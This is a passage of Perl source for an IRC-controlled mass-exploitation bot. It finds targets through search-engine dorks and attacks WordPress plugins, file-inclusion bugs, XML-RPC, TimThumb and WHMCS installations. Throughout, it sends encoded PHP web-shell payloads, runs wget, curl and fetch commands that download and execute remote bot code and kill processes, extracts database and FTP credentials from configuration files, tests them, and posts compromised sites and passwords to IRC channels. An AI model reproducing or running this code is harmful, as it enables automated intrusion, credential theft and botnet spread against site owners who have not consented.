2hlLy5zZXQvZWMudHh0O3BlcmwgZWMudHh0OyI7CiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOwpmdW5jdGlvbiBleCgkY2ZlKXsKJHJlcyA9ICcnOwppZiAoIWVtcHR5KCRjZmUpKXsKaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpewpAZXhlYygkY2ZlLCRyZXMpOwokcmVzID0gam9pbigiXG4iLCRyZXMpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7CiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSl7CkBvYl9zdGFydCgpOwpAc3lzdGVtKCRjZmUpOwokcmVzID0gQG9iX2dldF9jb250ZW50cygpOwpAb2JfZW5kX2NsZWFuKCk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygncGFzc3RocnUnKSl7CkBvYl9zdGFydCgpOwpAcGFzc3RocnUoJGNmZSk7CiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7CkBvYl9lbmRfY2xlYW4oKTsKfQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwb3BlbicpKXsKJGYgPSBAcG9wZW4oJGNmZSwiciIpOwp3aGlsZSghQGZlb2YoJGNmZSkpIHsgJHJlcyAuPSBAZnJlYWQoJGNmZSwxMDI0KTsgfQpAcGNsb3NlKCRmKTsKfX0KcmV0dXJuICRyZXM7Cn0=";
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $res = $ua->request($req);
}

sub ih_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$ihlogo15$engine 9Finished 15for 9$dork "); }
            my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVNNEVQNThWZndINCtzcXFSWkZPT2trRGhwcFRBaFVhQWZsbXZhK0FJcmN4SHE5SkdseE8yZDdpUDkrY0R2cHk3TExaTkpKVDFwMG5uUmVIbzhuWnorVXMyVjdXRVNsbU9DSjBsRjN2MzI4dlZLbEZES1J0QlJGTXo3MTk0MlJXcEMvdzVTaTJtSWxaQlRIdmY3MXJUY21uOG1EYXQ5aC8vUzB2ZFZ0Y1lycFIwZGNveER0QTZrMXAzQnJOSVRCMzlIZ0ZsOE9oemZKY2o4ZTRudmpjL3p6aG5zUS9UV0s0bTR5R3ZRY1lDeXlCU0F3eVFoTkVENVN3S0NwVTJyY2hEWjhlV0NLV1hXeG4wU0FmbkdjSlVhbzBqUEdwQkFaOVpiMUw0RjY5TlJGTkswazB3c0lINTllVWNsSS96eUNBUDJMQzN6OERDcmtpcjZDdWdhUVdscHlWbklJR1hSUDZmR0NrNEw2eTQ0ODk1MmNucDhQUUthNmRQcWdoWVFnM3lNTm9xditNRTBqRllUbFBoNExOYWFLeU44T1AwR05KVlZTZ1dvUnRpcmhYWHhXRk12UkoyWWtoS09aMXVWRXA5UG9CSW8xcmR6eDNnMktxWHlrcG9pNmd6dU93TnF6OGdvSjVxWkJlYXQrWk9UMUNhK0ViWUZyLzk0cXhDWitNemEvVk1OYkw4MEZwM054ek1Rb1JNbVVycytBRjU4TmJUZkQ1S0wzZEdkOWJSVnNhUTR5cWpSUTRRcG8zajhiWFZMWHczSFE3dys5K3dCcTV1VWU0M1plQWRROEswbVVPUTFneE0yRVZlb2thZmxwa1F2WWFRMzh3UEU1YmRQNEhMbnhBVU02RXdocU5kTTVQUm54UDdpWVpyU0hiMXM3aW5RMHo3c2Q1KzJPcGYwejNkUzBpWUNMcHRnL05Qd0ZwU0tIUnZ2NTBINEFhNEtEY3U0QWFqdmpKYmtGeHFTQ1VBK3hqd04xTlFFRDZLT3QwV0lIdVAzV0hDTWdRRE1WeTA4YnFVdkFJMUZMcGdnd21xNmMwNitkNjNLOUtaODVVVldJemJFbWxUM1M5bk9ZVnNWR0Rlc01sV1pWaHN5TXBmUE0zYlhVbU54UnRxcERkaWxZb1h6ajMvVTZuaDFWNjlveHZweGw2M2Z2SFJpSHBMcVNIQmxZQU9EbWhKL1c3R25hZVB1M1JkemQvWjhjZ1A1K2tqcVJrY3dEeVhHQkNyTlhRT2ticzFzUnNScUVHSis4THVpWktBckNzMVBBTHVOeXBaRmVsRFRFbW43UkdCbU5VSndXR2Q3MHh0VzRZQ3UvaTRQUkk4a3IrL3NCOEIxRzJZbHF2RXdwaFFPeUlZb3ExNnlFbDQ3RjdYSlJrNmJ5cGgzVHpYKzBNQ3BtVGpKbndXVjMyK2dZOUl0aGN5ekxLSytyU0s3MkRjQUUrTFhiektiNWlldWNoeTdhcTBoYzA3bHlINkgxSXRiaUd6VWQrK0RYT2crblp2T0FSSm9UcFU5YU5naXV5TnFIeDIycHJYaHJVTjYxRlhnVXUvVWN1VXl5bFhKeHpIbjdaV2dIYVUyMmpvWkdsd09rSit1d1dObDU0ZmpXZUNUeDdnRjBUbWtPQy9GVkV4ZWRjNGtCK04razZLSlpIQTAyNzdLYXdLYXBpL2tob1ZtM1lZODBSZ0ZpVnBxWnZmQ00zRTlURy82NFYwYjQ5d2QyTUFWZmg0UGxhR2VPOERGdHRyZnRoY2oxMERjcXd4MnhrdFhPSXJOaUxtQTFLeW1oWDVqU0N0NHNDNlYyNGEyVjJ5MGxYZCtDYzAySXBNUmFpb2tNRTZmQ2cvMzlhbFdLdVd4dGRQRXVsR0tTdDByMFFjTmZqOWwyWmJocFBwejhDdz09IikpKTsKJGZpY2hpZXIgPSBmb3BlbignLi9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOw==";
            my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
            my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
            my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
            my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $coba = &get_content($cekih);sleep(1);
                if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
                    &msg("$chan","$ihlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
                    my $res = &get_content($shell);sleep(1);
                    if ($res =~ /UnKnown - Simple Shell/){
                        &msg("$chan","$ihlogo15$engine 9<4=9>9 SheLL 9<4=9>9 $shell ");
                        } else { &msg("$chan","$ihlogo15$engine 9<4=9>9 Vuln 9<4=9>9 $site 9<4=9> Os=$uname $uid");
                        }
                    }
                } exit;
            }
        }
    }
}
sub rfi_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$rfilogo15$engine 9Finished 15for 9$dork "); }
            my $coba = "http://".$site.$bug."test??";
            my $test = "http://".$site.$bug.$injector."??";
            my $dor  = "http://".$site.$bug.$botshell."??";
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $cek  = &get_content($coba);sleep(1);
                &get_content($dor);sleep(1);
                if ($cek =~ /failed to open stream/) {
                    my $check = &get_content($test);sleep(1);
                    if ($check =~ /STUNSHELL/i) {
                        &os2($test,$chan,$engine,$rfilogo);
                        }
                    }
                } exit;
            }
        }
    }
}

sub lfi_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$lfilogo15$engine 9Finished 15for 9$dork "); }
            my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
            my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
            my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $html = &get_content($test);
                if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
                    my $res = lfi_env_query($test);
#                   &lfi_spread_query($test);
                    if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) {
                        my $os = $1;
                        my $uid = $2;
                        my $lficheck = &get_content($shell);
                        if ($lficheck =~ /UnKnown - Simple Shell/){
                            &msg("$chan","$lfilogo15$engine 9<4=9>9 SheLL 9<4=9>9 $shell 15(OS=$os) $uid ");
                        } else {
                            &msg("$chan","$lfilogo15$engine 9<4=9>9 Vuln 9<4=9>9 $site 15(OS=$os) $uid ");
                        }
                    }
                }
            } exit; }
        }
    }
}
sub lfi_env_query() {
    my $url = $_[0];
    my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUXVOVEZIMHVFdjl1bUZPeW93V0hla2lKVDV4ZEZsbUpUUWlOazc0QXNoeDdrc3h2ajYyWk1ka1U4ZDk3NzR3ZGtuS2h0TnE4eExuMzNLOHpkSzdUL1VQT3krMHR4WlRpaFlpVWpxVnAyMVRiVzFuS1QxT1NsWVhVWE16Y2ZUVHlLV1JxdUVWWnU2MG9ETUt3UDdpOGFTYng1L2pPdVhxM2YydlkzbmZkWnNWb1JVZFBFNS9zVUVONHdTYndpQUhEdjRMaE5UMGZqYTZpODA0NG9yZm81dUx6aG5zWS9Ea093a1EwSHZZdFlFV2tXRURRT0kzSk1oWXpBaEVzMGVSVFlIZU1wd2hHOFpUbCt5a0Q2RlF1YXpTRExoMDBVMnlSTW5UVi93cllKZzh0eFpKWFpiMkU5T0h4VEJCZERFRURWVEE0TzZOVWo4QlBwdGdycUZnQW1kSlpsbG42UTJSZUtEMU1pamgwN25jaXgzNVV4NmVuVUtDcG5wbmQ2VTlQa3BlQ2hzSEZZQlNzQmVVeHoxdzZLZFNFcVV2K2JmQmtoaFl2S1dXNldLaHVpZTdTODB2eGpIekNJNGtGbVhoZEhtazZEVUxBU3pQS2plaGZrWkRKZTRaYTFCUGNDQUxXdnFHM2tHQmgrcVNtNjNSVVhwL3dFMFRQRU8vZUdZYjQxSHB4ODFzd3VtbVNyQkFNSllPS1JGSWxFN2F1QVNjOEdmYXZVOUZNLzQvZzh2Z2lZNHdPUmFZMEovNFQ2bWRqTXI0SUxsVFJZekFZT2JjZTdTektQUzZTckFJb1BpdWVseG56UU9Lb0VNa3N4YmJlTHJFSjIybUE3eWlmd3pmSjU5REtCMERKdkNDMHE3bk9TMklzZmhmRlQ1QTlFcHJlVmpoMFROYnRTeTlCUk1PbkJWd3d4Zjl6L2tJa0tUSTRyUjhQektmWG5mU290NnJwMFdGMEFqWjJnbHRnakNvNGVaKzYxSU1SSXpBQUw5b1kzYlpVMjJLdE1ZWUFHS0xpcVdJeTVWaHJoQXlyRWg0bHN5Zm43SGpuYlZ0aXFvZUhCd1VwSG5SSG1hTjVZcWFaU1NMUnNNWlZ1WUJ2QkxXVkxFVjd4eEkwVENXMktsOTJLY3RQdWVqZmFEcU9FYUprN2FBdmNNSzQybnZ2MFNHWnJxUWdkZkVBM0p6c3c1cmRxTHkyZjZ2RXpjMS9xUUhvbDR2VWhaQXlCeWlUT2Nsa2hRRFRTcmhHVm5rNDhDbnR2VUhvVnBIbnNWVWJBcnRjbEpVbWJVd3luM2YyVWthQ0hQczB5VWE2NlEyclZzNmYvRFlQSmZka1NabmZhb0R2WUhROTUzV3pSZ1lIY1VYa1NLWnNDUzhiZzl0WWNCMDNuVGZqNERUL01zSzR6SW80SlhROGNIT01EcUtmV2pQbmRzcFIzYTJ5dldJQXBoQmZ1MFNiK0pQV05ROTV0a3E3dUhFTEUzMVYxcHRMeTQ5NTJ1ajN2OVJvQkZ2Z0F5VldGaXZsNjJzandEWk0rK2hScjdpMUEyTFF1N1pOa2JGNHh3WTN5N1V5RVNuSExWOCszWUdkbHVtamlhbmJnYUFINHpETEdMZGlhKzAwbERpM2dETWdvOE84dUhTUnpjN1NDQUh1TjFCblhsTTJERGJ1cWh2UGxLbWIrUzZwWTAyN1ZCcEl3TnVScGJnWEhvbGR4SEhESDBsV0FuOTdpQWFUOTJnNlMxNkhwNFFla1ZSbTI1NlJYSXUrYmhudWlLR3NhZWFwYkhEVmVLMlVlVjFPUHpjSzJqY2ZTOVlLYW56RXZyREV4Vmx6cTB3UmFEQ1dycjl2eWY5VjZuR0s3SEt4ODAvaUQ3MS9BQT09IikpKTsKJGZpY2hpZXIgPSBmb3BlbignL3RtcC9sb2JleCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7';
    my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.get_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>");
    $ua->timeout(7);
    my $req = HTTP::Request->new(GET => $url);
    my $res = $ua->request($req);
    return $res->content;
}

sub xml_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$xmllogo15$engine 9Finished 15for 9$dork "); }
            my $test = "http://".$site.$bug;
            my $vuln = "http://".$site."12".$bug;
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
            my $html = &get_content($test);
            if ($html =~ /faultcode/i ) {
            my $resp = &xml_cek_query2($test);
            if ($resp =~ /Byroe(.*)Lobex/s) {
#           &xml_spread_query($test);sleep(1);
            my $sys = $1;
            my $shell = "http://".$site."/lobex.php";
            my $check = &get_content($shell);
                if ($check =~ /UnKnown - Simple Shell/) {
                my $safe = ""; my $os = ""; my $uid = "";
                if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
                if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
                if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
                &msg("$chan","$xmllogo15$engine 9<4=9>9 sHeLL 9<4=9>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                &msg("$admin","$xmllogo15$engine 9<4=9>9 sHeLL 9<4=9>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                }
#               else {
#               &msg("$chan","0,1$xmllogo(4@8$engine15)15(13@12SysTem15)10 ".$vuln." 3".$sys); sleep(1);}
                }
            }
                } exit;
            }
        }
    }
    }

sub xml_cek_query() {
    my $url     = $_[0];
    my $code = "system('uname -a');";
    my $ua = LWP::UserAgent->new(agent => 'perl post');
        $exploit = "<?xml version=\"1.0\"?><methodCall>";
        $exploit .= "<methodName>test.method</methodName>";
        $exploit .= "<params><param><value><name>',''));";
        $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
    $ua->timeout(7);
    my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
    return $res->content;
}

sub xml_cek_query2() {
    my $url = $_[0];
    my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVNNEVQNThWZndINCtzcXFSWkZPT2trRGhwcFRBaFVhQWZsbXZhK0FJcmN4SHE5SkdseE8yZDdpUDkrY0R2cHk3TExaTkpKVDFwMG5uUmVIbzhuWnorVXMyVjdXRVNsbU9DSjBsRjN2MzI4dlZLbEZES1J0QlJGTXo3MTk0MlJXcEMvdzVTaTJtSWxaQlRIdmY3MXJUY21uOG1EYXQ5aC8vUzB2ZFZ0Y1lycFIwZGNveER0QTZrMXAzQnJOSVRCMzlIZ0ZsOE9oemZKY2o4ZTRudmpjL3p6aG5zUS9UV0s0bTR5R3ZRY1lDeXlCU0F3eVFoTkVENVN3S0NwVTJyY2hEWjhlV0NLV1hXeG4wU0FmbkdjSlVhbzBqUEdwQkFaOVpiMUw0RjY5TlJGTkswazB3c0lINTllVWNsSS96eUNBUDJMQzN6OERDcmtpcjZDdWdhUVdscHlWbklJR1hSUDZmR0NrNEw2eTQ0ODk1MmNucDhQUUthNmRQcWdoWVFnM3lNTm9xditNRTBqRllUbFBoNExOYWFLeU44T1AwR05KVlZTZ1dvUnRpcmhYWHhXRk12UkoyWWtoS09aMXVWRXA5UG9CSW8xcmR6eDNnMktxWHlrcG9pNmd6dU93TnF6OGdvSjVxWkJlYXQrWk9UMUNhK0ViWUZyLzk0cXhDWitNemEvVk1OYkw4MEZwM054ek1Rb1JNbVVycytBRjU4TmJUZkQ1S0wzZEdkOWJSVnNhUTR5cWpSUTRRcG8zajhiWFZMWHczSFE3dys5K3dCcTV1VWU0M1plQWRROEswbVVPUTFneE0yRVZlb2thZmxwa1F2WWFRMzh3UEU1YmRQNEhMbnhBVU02RXdocU5kTTVQUm54UDdpWVpyU0hiMXM3aW5RMHo3c2Q1KzJPcGYwejNkUzBpWUNMcHRnL05Qd0ZwU0tIUnZ2NTBINEFhNEtEY3U0QWFqdmpKYmtGeHFTQ1VBK3hqd04xTlFFRDZLT3QwV0lIdVAzV0hDTWdRRE1WeTA4YnFVdkFJMUZMcGdnd21xNmMwNitkNjNLOUtaODVVVldJemJFbWxUM1M5bk9ZVnNWR0Rlc01sV1pWaHN5TXBmUE0zYlhVbU54UnRxcERkaWxZb1h6ajMvVTZuaDFWNjlveHZweGw2M2Z2SFJpSHBMcVNIQmxZQU9EbWhKL1c3R25hZVB1M1JkemQvWjhjZ1A1K2tqcVJrY3dEeVhHQkNyTlhRT2ticzFzUnNScUVHSis4THVpWktBckNzMVBBTHVOeXBaRmVsRFRFbW43UkdCbU5VSndXR2Q3MHh0VzRZQ3UvaTRQUkk4a3IrL3NCOEIxRzJZbHF2RXdwaFFPeUlZb3ExNnlFbDQ3RjdYSlJrNmJ5cGgzVHpYKzBNQ3BtVGpKbndXVjMyK2dZOUl0aGN5ekxLSytyU0s3MkRjQUUrTFhiektiNWlldWNoeTdhcTBoYzA3bHlINkgxSXRiaUd6VWQrK0RYT2crblp2T0FSSm9UcFU5YU5naXV5TnFIeDIycHJYaHJVTjYxRlhnVXUvVWN1VXl5bFhKeHpIbjdaV2dIYVUyMmpvWkdsd09rSit1d1dObDU0ZmpXZUNUeDdnRjBUbWtPQy9GVkV4ZWRjNGtCK04razZLSlpIQTAyNzdLYXdLYXBpL2tob1ZtM1lZODBSZ0ZpVnBxWnZmQ00zRTlURy82NFYwYjQ5d2QyTUFWZmg0UGxhR2VPOERGdHRyZnRoY2oxMERjcXd4MnhrdFhPSXJOaUxtQTFLeW1oWDVqU0N0NHNDNlYyNGEyVjJ5MGxYZCtDYzAySXBNUmFpb2tNRTZmQ2cvMzlhbFdLdVd4dGRQRXVsR0tTdDByMFFjTmZqOWwyWmJocFBwejhDdz09IikpKTsKJGZpY2hpZXIgPSBmb3BlbignLi9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOw==";
    my $ua = LWP::UserAgent->new(agent => 'perl post');
        $exploit = "<?xml version=\"1.0\"?><methodCall>";
        $exploit .= "<methodName>test.method</methodName>";
        $exploit .= "<params><param><value><name>',''));";
        $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
    $ua->timeout(7);
    my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
    return $res->content;
}

sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd  = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');";
        my $userAgent = LWP::UserAgent->new(agent => 'perl post');
        $exploit = "<?xml version=\"1.0\"?><methodCall>";
        $exploit .= "<methodName>test.method</methodName>";
        $exploit .= "<params><param><value><name>',''));";
        $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
    $userAgent->timeout(7);
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}

sub thumb_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
            $count++;
            my $vuln = "http://".$site.$bug."?src=".$thumbshell;
            my $botis = "http://".$site.$bug."?src=".$botid;
            my $botxc = "http://".$site.$bug."?src=".$botxid;
            if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
                my @nbug = split(/\//,$bug);
                my $cek  = &get_content($vuln);sleep(1);
                if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
                    &msg("$chan","$thumblogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
                    my $pdir = $2;
                    if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
                    my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
                    my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
                    my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
                    my $npath = "http://".$site."/wp-includes/wp-script.php";
                    my $check = &get_content($crut."?clone");sleep(1);
                    if ($check =~ /GIF89a/i){
                        my $safe = ""; my $os = ""; my $uid = "";
                        if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
                        if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
                        if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
                        my $crot = &get_content($npath);sleep(1);
                        if ($crot =~ /GIF89a/i){
                            &msg("$admin","$thumblogo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$npath."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                            &msg("$chan","$thumblogo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$npath."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        } else {
                            &msg("$admin","$thumblogo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$crut."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                            &msg("$chan","$thumblogo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$crut."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        }
                        &get_content($botc);sleep(1);
                        &get_content($botpc);sleep(1);
                    }
                }
            } exit; }
        if ($count == $num-1) { &msg("$chan","$thumblogo15$engine 9Finished 15for 9$dork "); }
        }
    }
}

sub whmcs_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$whmcslogo15$engine 9Finished 15for 9$dork "); }
            my $test1 = "http://".$site.$bug."../../../configuration.php%00";
            my $submit = "http://".$site.$subticket;
            if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
            my $html = &get_content($test1);
            if ($html =~ /db_host/i) {
            my $userpass = &getUserPass($html); sleep(2);
            my $info = &getinfo($html); sleep(2);
                &msg("$chaninfo","$whmcslogo15$engine 4<9=4>9 info 15[ 9http://".$site."15 ] 9$info");
            my $lulz = "http://".$site;
            my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = "";
            if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
                my $host = $2;
                my @ftpu = split(":Viva-Byroe.Net:", $userpass);
                my @dbic = split(":Viva-Byroe.Net:", $info);
                $user = $ftpu[0]; $pass = $ftpu[1];
                $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $dbic[2];
                my $ftpstat = "";
                    if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
                        &ftp_connect($test1,$host,$user,$pass,$chan,$engine,$whmcslogo);sleep(1);
                        &dbi_connect($host,$user2,$pass2,$dtbs2,$chan,$engine,$whmcslogo);sleep(1);
                    }
                    my $ceksubmit = &get_content($submit);
                    if ($ceksubmit =~ /Urgency/i) {
                        &msg("$submitchan","$whmcslogo15$engine 4<9=4>9 Submit Ticket 15[9 ".$submit." 15]"); sleep(2);
                    my $uploader = "http://".$site."/downloads/indexx.php";
                    my $uploader2 = "http://".$site."/templates_c/indexx.php";
                    my $cekup = &get_content($uploader);
                    my $cekup2 = &get_content($uploader2);
                    if ($cekup =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo15$engine 9<4=9>9 Uploader 15[9 ".$uploader." 15]");&msg("$admin","$whmcslogo15$engine 9<4=9>9 Uploader 15[9 ".$uploader." 15]"); }
                    if ($cekup2 =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo15$engine 9<4=9>9 Uploader 15[9 ".$uploader2." 15]");&msg("$chanxxx","$whmcslogo15$engine 9<4=9>9 Uploader 15[9 ".$uploader2." 15]"); }
                    }
                    }
                } exit;
            }
        }
    }
}

sub ftp_connect {
    my $url = $_[0];
    my $host = $_[1];
    my $user = $_[2];
    my $pass = $_[3];
    my $chan = $_[4];
    my $engine = $_[5];
    my $logo = $_[6];
    my $success = 1;
    use Net::FTP;
    my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
        $success = 0 if $ftp->login($user,$pass);
        $ftp->quit;
        if ($success == 0) {
        &msg("$chanxxx","$logo15$engine 9<4=9>9 FTP 15[ 9http://".$host." 15] [4 ".$user.":".$pass." 15]");
    }
}
sub dbi_connect () {
    my $host = $_[0];
    my $user = $_[1];
    my $pass = $_[2];
    my $dtbs = $_[3];
    my $chan = $_[4];
    my $engine = $_[5];
    my $logo = $_[6];
    my $port = "3306";
    my $platform = "mysql";
    my $dsn = "dbi:$platform:$dtbs:$host:$port";
    my $DBIconnect=  DBI->connect($dsn,$user,$pass);
        if ($DBIconnect) {
        &msg("$chanxxx","$logo15$engine 9<4=9>9 MySql 15[ 9http://".$host." 15] [4 Connected 15]");
    }
}
sub getUserPass() {
    my $string = $_[0];
    my @lol = split("\r\n", $string);
    my $pass = "";
    my $user = "";
    foreach my $line (@lol) {
        if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
            $pass = $3;
        }
        if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
            $user = $3;
        }
    }
    return $user.":Viva-Byroe.Net:".$pass;
}

sub getinfo() {
    my $string = $_[0];
    my @lol = split("\r\n", $string);
    my $pass = "";
    my $user = "";
    my $dbs = "";
    foreach my $line (@lol) {
        if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
            $pass = $3;
        }
        if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
            $user = $3;
        }
        if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
            $dbs = $3;
        }
    }
    return $user.":user:".$pass.":pass:".$dbs;
}

sub zero_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
            $count++;
            if ($count == $num-1) { &msg("$chan","$zerologo15$engine 9Finished 15for 9$dork "); }
